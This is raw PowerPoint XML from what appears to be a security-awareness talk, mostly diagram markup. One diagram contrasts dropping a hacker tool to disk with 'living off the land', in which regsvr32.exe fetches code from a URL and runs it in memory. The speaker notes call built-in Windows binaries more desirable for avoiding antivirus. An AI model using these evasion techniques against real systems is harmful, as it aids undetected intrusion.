    <dgm:cxn modelId="{5E9BD48A-42DA-4E03-A66C-32A028FBADB5}" srcId="{65F04816-3BB6-4371-A8CA-5340FC8D28E3}" destId="{DBE952AD-77A6-4896-A077-7E711CF1C60D}" srcOrd="1" destOrd="0" parTransId="{F546E546-02E7-4053-86D8-D5045C4CC64B}" sibTransId="{E896ABC0-2914-41A7-96C0-A5B81220AA5C}"/>
    <dgm:cxn modelId="{60E4C39D-3E71-4320-B286-8463B0439F4B}" type="presOf" srcId="{A1B22CC7-4A55-49C2-8145-596CA48D295A}" destId="{9B70452D-6DA3-4ACE-BD84-45159DA0156D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{C87A08A1-7EDC-4397-A77C-A7A9D5562A05}" srcId="{0AFD8B07-9F41-49DE-A678-89D5CBEAE7EC}" destId="{02BF6EFA-AFFB-4EB7-9B56-623F83771019}" srcOrd="3" destOrd="0" parTransId="{697E5897-EDB3-4C8F-960B-269570A67DE9}" sibTransId="{AF7EA33F-A877-4F9E-B1A9-72E32AA44C57}"/>
    <dgm:cxn modelId="{ED4E2FAF-F5E5-45C8-ADA2-95F3D760CB64}" srcId="{DBE952AD-77A6-4896-A077-7E711CF1C60D}" destId="{C700D14A-5B8D-462D-ABBB-64AC735A8874}" srcOrd="0" destOrd="0" parTransId="{3E370A2F-291F-4BFB-BF92-2145220B6077}" sibTransId="{A1B22CC7-4A55-49C2-8145-596CA48D295A}"/>
    <dgm:cxn modelId="{53F699B5-FFDA-4DD7-8A1A-B57458CC943E}" type="presOf" srcId="{93A314A8-857E-4077-8D62-927A2CEED7AE}" destId="{24390179-6EC5-4AEE-B116-DE6B8C88FE42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{1924CAB7-2071-4C86-BBFA-AE9F89113899}" srcId="{0AFD8B07-9F41-49DE-A678-89D5CBEAE7EC}" destId="{93A314A8-857E-4077-8D62-927A2CEED7AE}" srcOrd="1" destOrd="0" parTransId="{9CFB164D-7DCB-47A3-BEDC-F36D0DEEAE07}" sibTransId="{5D433390-AAA9-4447-B889-6998CA63ED80}"/>
    <dgm:cxn modelId="{8AD12CB9-43C8-4472-AEB3-3248C49A91CF}" type="presOf" srcId="{4ADE4EBD-8645-4826-9A57-1309A1373CED}" destId="{B7986645-D74F-4DAE-B0BB-D1C4DC370663}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{34CB9ECA-CF39-4A95-92C5-4C1FBEDC8BD5}" type="presOf" srcId="{931134C8-CC78-4181-AB82-9DD3449B9CBB}" destId="{7F945931-5F4B-4C31-8AB4-58DFE571DEFE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{0184DFD4-9E51-4B6A-811B-09F445CD2122}" type="presOf" srcId="{622AEB94-1F35-4733-8664-2BDBE4C77F5C}" destId="{82E375E5-B514-430A-83D8-4ADA29FC27E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{C6826858-FCD2-4898-9E2A-3139BFE53FAE}" type="presParOf" srcId="{9296C62F-A86D-4221-8782-B853CC6CD572}" destId="{664A5926-08A4-4692-B486-735C27BEE49A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{39A10367-7125-4AF4-9715-20B5AC4AAE22}" type="presParOf" srcId="{664A5926-08A4-4692-B486-735C27BEE49A}" destId="{4BE53F5B-8FDB-416A-8C2C-E9CAA9C22704}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{AB3201BA-17ED-4E50-85DB-92782447AFA4}" type="presParOf" srcId="{664A5926-08A4-4692-B486-735C27BEE49A}" destId="{2386A7AD-B192-4A25-A6B9-4CB22AAF1053}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{0542D20D-E91B-466D-A858-42769E9D6FD4}" type="presParOf" srcId="{664A5926-08A4-4692-B486-735C27BEE49A}" destId="{7F945931-5F4B-4C31-8AB4-58DFE571DEFE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{D6E812F6-18B1-4BEA-90B8-5AFB00F8429F}" type="presParOf" srcId="{664A5926-08A4-4692-B486-735C27BEE49A}" destId="{7DDB990C-661E-4921-8824-842E99B6E86B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{04A32A27-17BA-4933-AC8D-47054512D62C}" type="presParOf" srcId="{664A5926-08A4-4692-B486-735C27BEE49A}" destId="{24390179-6EC5-4AEE-B116-DE6B8C88FE42}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{EF2FA291-AD02-4738-A5B3-65FD60648469}" type="presParOf" srcId="{664A5926-08A4-4692-B486-735C27BEE49A}" destId="{55DD7E43-7375-4107-A60D-830145718591}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{895CB80F-123C-45C2-B7FA-70F1F07E8C67}" type="presParOf" srcId="{664A5926-08A4-4692-B486-735C27BEE49A}" destId="{08B7B3AF-8974-41AA-B7A3-C35ABB11AE20}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{E3023888-4CBA-44DA-818C-B2FE249A95E9}" type="presParOf" srcId="{664A5926-08A4-4692-B486-735C27BEE49A}" destId="{B7986645-D74F-4DAE-B0BB-D1C4DC370663}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{219019EF-EBFF-4AEC-8CDA-F0728AB7DECA}" type="presParOf" srcId="{664A5926-08A4-4692-B486-735C27BEE49A}" destId="{8A74E8BF-1159-455D-BF56-9ADBAB4E641C}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{47E1A720-1C31-4027-B729-C7C38CA4D3AB}" type="presParOf" srcId="{9296C62F-A86D-4221-8782-B853CC6CD572}" destId="{70AD9999-1AF2-495B-B492-24A0B497FC32}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{43F37B9C-074F-4DC2-B967-3617B24DF9D7}" type="presParOf" srcId="{9296C62F-A86D-4221-8782-B853CC6CD572}" destId="{7C555102-959D-417D-AF2B-2C964F0E8A7F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{EEFDBE4E-10C1-4C3A-B441-1E143D6B50F9}" type="presParOf" srcId="{7C555102-959D-417D-AF2B-2C964F0E8A7F}" destId="{B53BEE86-B0F2-49FF-AA8A-64361696F70C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{457D2E3F-D756-4C26-A067-4FDEC68AB97D}" type="presParOf" srcId="{7C555102-959D-417D-AF2B-2C964F0E8A7F}" destId="{5D90CFEF-CFC6-4974-A724-9A8BD9BD094F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{C58C8CC5-9E46-48CB-863C-975A09252C5D}" type="presParOf" srcId="{7C555102-959D-417D-AF2B-2C964F0E8A7F}" destId="{27916E72-7250-49AF-BC3C-7C6CF37352D5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{200DF96A-2857-47CF-A1EB-73826B277582}" type="presParOf" srcId="{7C555102-959D-417D-AF2B-2C964F0E8A7F}" destId="{9B70452D-6DA3-4ACE-BD84-45159DA0156D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1"/>
    <dgm:cxn modelId="{5B9BFB3D-538B-4FD8-AC1F-A3A3CBCDD390}" type="presParOf" srcId="{7C555102-959D-417D-AF2B-2C964F0E8A7F}" destId="{82E375E5-B514-430A-83D8-4ADA29FC27E3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53F5B-8FDB-416A-8C2C-E9CAA9C22704}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="397844" y="0"/>
          <a:ext cx="3060340" cy="765085"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="14908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 dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Old </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="2500" kern="1200" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>school</a:t>
          </a:r>
          <a:endParaRPr lang="nb-NO" sz="2500" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420253" y="22409"/>
        <a:ext cx="3015522" cy="720267"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2386A7AD-B192-4A25-A6B9-4CB22AAF1053}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1861069" y="832029"/>
          <a:ext cx="133889" cy="1338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945931-5F4B-4C31-8AB4-58DFE571DEFE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="397844" y="1032864"/>
          <a:ext cx="3060340" cy="765085"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="149089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dirty="0" err="1"/>
            <a:t>Binary</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>dropped</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> to disk – C:\temp\hackertool.exe</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420253" y="1055273"/>
        <a:ext cx="3015522" cy="720267"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7DDB990C-661E-4921-8824-842E99B6E86B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1861069" y="1864894"/>
          <a:ext cx="133889" cy="1338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90179-6EC5-4AEE-B116-DE6B8C88FE42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="397844" y="2065729"/>
          <a:ext cx="3060340" cy="765085"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="149089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dirty="0" err="1"/>
            <a:t>Executes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> hackertool.exe from disk</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420253" y="2088138"/>
        <a:ext cx="3015522" cy="720267"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{55DD7E43-7375-4107-A60D-830145718591}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1861069" y="2897759"/>
          <a:ext cx="133889" cy="1338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7B3AF-8974-41AA-B7A3-C35ABB11AE20}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="397844" y="3098594"/>
          <a:ext cx="3060340" cy="765085"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="149089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dirty="0"/>
            <a:t>Files </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>extracted</a:t>
          </a:r>
          <a:endParaRPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420253" y="3121003"/>
        <a:ext cx="3015522" cy="720267"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B7986645-D74F-4DAE-B0BB-D1C4DC370663}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1861069" y="3930624"/>
          <a:ext cx="133889" cy="1338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4E8BF-1159-455D-BF56-9ADBAB4E641C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="397844" y="4131459"/>
          <a:ext cx="3060340" cy="765085"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="149089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dirty="0" err="1"/>
            <a:t>Modules</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>the</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> hacker </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>tool</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>loaded</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>into</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>memory</a:t>
          </a:r>
          <a:endParaRPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="420253" y="4153868"/>
        <a:ext cx="3015522" cy="720267"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B53BEE86-B0F2-49FF-AA8A-64361696F70C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3886631" y="0"/>
          <a:ext cx="3060340" cy="765085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500" kern="1200" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Living</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="2500" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="2500" kern="1200" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>off</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="2500" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="2500" kern="1200" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>the</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="2500" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> land</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3909040" y="22409"/>
        <a:ext cx="3015522" cy="720267"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5D90CFEF-CFC6-4974-A724-9A8BD9BD094F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="5349856" y="832029"/>
          <a:ext cx="133889" cy="1338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16E72-7250-49AF-BC3C-7C6CF37352D5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3886631" y="1032864"/>
          <a:ext cx="3060340" cy="765085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dirty="0" err="1"/>
            <a:t>Executes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> regsvr32.exe to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>fetch</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>code</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> from url</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3909040" y="1055273"/>
        <a:ext cx="3015522" cy="720267"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9B70452D-6DA3-4ACE-BD84-45159DA0156D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="5349856" y="1864894"/>
          <a:ext cx="133889" cy="133889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E375E5-B514-430A-83D8-4ADA29FC27E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3886631" y="2065729"/>
          <a:ext cx="3060340" cy="765085"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="0070C0"/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800" kern="1200" dirty="0"/>
            <a:t>Runs </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>directly</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>into</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="nb-NO" sz="1800" kern="1200" dirty="0" err="1"/>
            <a:t>memory</a:t>
          </a:r>
          <a:endParaRPr lang="nb-NO" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3909040" y="2088138"/>
        <a:ext cx="3015522" cy="720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How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>difficult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> is it to start hacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>someone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>today</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>, not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> hard! SHODAN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2404457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SWIFTONSEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Bringing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binaries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leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> traces and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eventually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>picked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> up by AV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>- Using Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>binaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>actions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> is more desirable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1813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26772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51886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98354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6642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292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97097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7714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9354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9348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6845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1953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95440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51484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973925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75117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8647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13786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61409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65390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1722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SHODAN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2631428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75329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3107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4183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14411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3989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0631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933549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41052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092553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49116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SHODAN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424472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55986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25542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899895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610449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3866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677773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84706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50434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534115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93133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SHODAN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25118545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623951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874958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66979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521110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594440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200743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11016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798388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231904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83403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http://resources.infosecinstitute.com/evolution-in-the-world-of-cyber-crime/#gref</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24012889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875955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639378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290140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405311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3801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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Bringing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>own</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>binaries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leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> traces and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>eventually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>picked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> up by AV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>- Using Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>binaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>actions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> is more desirable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2138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One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Sometimes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>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put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disk as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-N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6850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4445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89" r:id="rId5"/>
